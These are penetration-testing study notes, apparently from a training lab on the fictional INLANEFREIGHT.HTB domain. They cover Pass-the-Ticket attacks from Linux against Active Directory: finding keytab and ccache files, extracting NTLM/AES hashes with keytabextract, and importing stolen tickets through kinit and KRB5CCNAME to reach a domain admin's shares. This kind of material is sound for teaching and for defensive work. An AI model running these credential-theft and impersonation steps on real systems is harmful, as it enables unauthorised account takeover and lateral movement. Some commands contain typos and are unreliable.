Linux PtT
Kerberos and Linux
Even if it's less common, Linux machines can also connect to Active Directory, but here's the take: it is not mandatory for a Linux machine to ==join== the domain in order to use Kerberos, as they can use Kerberos Tickets in scripts or to authenticate to the network.
Windows and Linux machines both request TGTs and TGSs in the same manner, but the difference is in ==storing these tickets==. On Linux, it highly depends on the distribution in use but in general, they are stored in two file types:
ccache files: files residing in /tmp directory with read and write protections. The environment variable KRB5CCNAME identifies if the tickets are in-use or the default location is changed. ==A user with elevated privileges has access to these tickets.==
keytab files: These files, used to authenticate the user to various services in the current session without a password, contain pairs of Kerberos principles and encrypted keys which are related with the Kerberos password. It is important to note that the keytab files need to be changed after each password change. These files are commonly used in scripts to access files stored in the Windows share folder without human interaction. They do not depend on the system in which they were created on, so they're portable to use in other computers.
Identifying AD within Linux
1- realme Tool
$realm list
inlanefreight.htb
type: kerberos
realm-name: INLANEFREIGHT.HTB
domain-name: inlanefreight.htb
configured: kerberos-member
server-software: active-directory
client-software: sssd
required-package: sssd-tools
required-package: sssd
required-package: libnss-sss
required-package: libpam-sss
required-package: adcli
required-package: samba-common-bin
login-formats: %U@inlanefreight.htb
login-policy: allow-permitted-logins
permitted-logins: david@inlanefreight.htb, julio@inlanefreight.htb
permitted-groups: Linux Admins
2- Look for sssd and winbind processes
sssd and winbind are tools used for integrating AD within Linux.
ps -ef | grep -i "winbind\|sssd"
Finding Kerberos Tickets
Hunting for Keytab Files
Remember that to use keytab files you need read and write permissions.
File extension lookup
find / -name *keytab* -ls 2>/dev/null
Cronjobs
$crontab -l
# Edit this file to introduce tasks to be run by cron.
#
<SNIP>
#
# m h dom mon dow command
*5/ * * * * /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
carlos@inlanefreight.htb@linux01:~$ cat /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
#!/bin/bash
kinit svc_workstations@INLANEFREIGHT.HTB -k -t /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
smbclient //dc01.inlanefreight.htb/svc_workstations -c 'ls' -k -no-pass > /home/carlos@inlanefreight.htb/script-test-results.txt
kinit allows interaction with Kerberos and works on requesting the user's TGT and store it in ccache file. This is a ==target==.
Since the tickets are represented as keytab files in the Linux environment, we will try to gain access to these files found by default on /etc/krb5.keytab.
We will use kinit to import a keytab into our session and act as the user. In the case above, the script is importing svc_workstation.kt which belongs to svc_workstation@INLANEFREIGHT.HTB.
Hunting for ccache files
While theyre still valid, of course, we can abuse these ccache files to impersonate a user. But first let's find them:
ls -la /tmp
krb5cc_647401106_tBswau
krb5cc_647401107_Gf415d
krb5cc_647402606_qd2Pfh
Abusing keytab files
We will use two methods.
The first one will give us access to specific shared folders in the context of the victim.
The second one will give us access to his entire account if we can perform a PtH with an NTLM hash, forge our own tickets with Rubeus using his AES Hash or cracking them :3 .
Method 1: Importing Tickets
We need to know to which user this KeyTab file belongs to and then abuse it.
Extract valuable information from KeyTab files
$klist -k -t /opt/specialfiles/carlos.keytab
Keytab name: FILE:/opt/specialfiles/carlos.keytab
KVNO Timestamp Principal
---- ------------------- ------------------------------------------------------
1 10/06/2022 17:09:13 carlos@INLANEFREIGHT.HTB
Impersonating a user with KeyTab
$klist
Ticket cache: FILE:/tmp/krb5cc_647401107_r5qiuu
Default principal: david@INLANEFREIGHT.HTB
Valid starting Expires Service principal
10/06/22 17:02:11 10/07/22 03:02:11 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 10/07/22 17:02:11
This confirms that we're using David's ticket.
IMPORTANT: Before importing another user's ticket we should make a copy of the current session's ticket and not lose it later. The ticket resides by default in the KRB5CCNAME environment variable
Now let's import carlos' ticket:
$kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab
$klist
Ticket cache: FILE:/tmp/krb5cc_647401107_r5qiuu
Default principal: carlos@INLANEFREIGHT.HTB
Valid starting Expires Service principal
10/06/22 17:16:11 10/07/22 03:16:11 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 10/07/22 17:16:11
By now, we can now act as carlos and access whatever shares intended for him.
$smbclient //dc01/carlos -k -c ls
Method 2: KeyTabExtract tool
$python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab
[+] Keytab File successfully imported.
REALM : INLANEFREIGHT.HTB
SERVICE PRINCIPAL : carlos/
NTLM HASH : a738f92b3c08b424ec2d99589a9cce60
AES-256 HASH : 42ff0baa586963d9010584eb9590595e8cd47c489e25e82aae69b1de2943007f
AES-128 HASH : fa74d5abf4061baa1d4ff8485d1261c4
It is important to note that a single keytab file can contain various information about several and different users. All in one file. Good for us. If we successfully crack the password, we can login as the victim, and obtain even more hashes through other keytab files that are being used by scripts or cronjobs. As an example:
Carlos has a cronjob that uses a keytab file named
svc_workstations.kt
. We can repeat the process, crack the password, and log in assvc_workstations
.
$su - carlos@inlanefreight.htb
$ klist
Ticket cache: FILE:/tmp/krb5cc_647402606_ZX6KFA
Default principal: carlos@INLANEFREIGHT.HTB
Valid starting Expires Service principal
10/07/2022 11:01:13 10/07/2022 21:01:13 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 10/08/2022 11:01:13
Abusing ccache files
These files are located in /tmp
and needs read+write
permissions to abuse them. So we need to escalate to root in order to get whatever we need about the ccache file's owner.
root#ls -la /tmp
-rw------- 1 julio@inlanefreight.htb krb5cc_647401106_HRJDux
-rw------- 1 julio@inlanefreight.htb krb5cc_647401106_qMKxc6
-rw------- 1 david@inlanefreight.htb krb5cc_647401107_O0oUWh
-rw------- 1 svc_workstations@inlanefreight.htb krb5cc_647401109_D7gVZF
-rw------- 1 carlos@inlanefreight.htb krb5cc_647402606
-rw------- 1 carlos@inlanefreight.htb krb5cc_647402606_ZX6KFA
To gain valuable intel on the victim, we can look at the groups that our target belongs to and maybe aim for the ones administrative rights of course. If one belongs to the local admins group, we will indeed get access to the DC host. Juicy enough!
root@linux01:~# id julio@inlanefreight.htb
<SNIP>647400512(domain admins@inlanefreight.htb)<SNIP>
Importing the ccache File to the Current Session
Checking what ccache files are loaded:
root@linux01:~# klist
klist: No credentials cache found (filename: /tmp/krb5cc_0)
Note: klist displays the ticket information. We must consider the values "valid starting" and "expires." If the expiration date has passed, the ticket will not work. ccache files
are temporary. They may change or expire if the user no longer uses them or during login and logout operations.
Making a copy of the ccache file to use and importing it:
root@linux01:~# cp /tmp/krb5cc_647401106_I8I133 .
root@linux01:~# export KRB5CCNAME=/root/krb5cc_647401106_I8I133
Checking the importation:
root@linux01:~# klist
Ticket cache: FILE:/root/krb5cc_647401106_I8I133
Default principal: julio@INLANEFREIGHT.HTB
Valid starting Expires Service principal
10/07/2022 13:25:01 10/07/2022 23:25:01 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 10/08/2022 13:25:01
We successfully imported to ccache file to the current session, now we can access to the victim's (Julio in the example above.) Now we can access the victim's shares:
root@linux01:~# smbclient //dc01/C$ -k -c ls -no-pass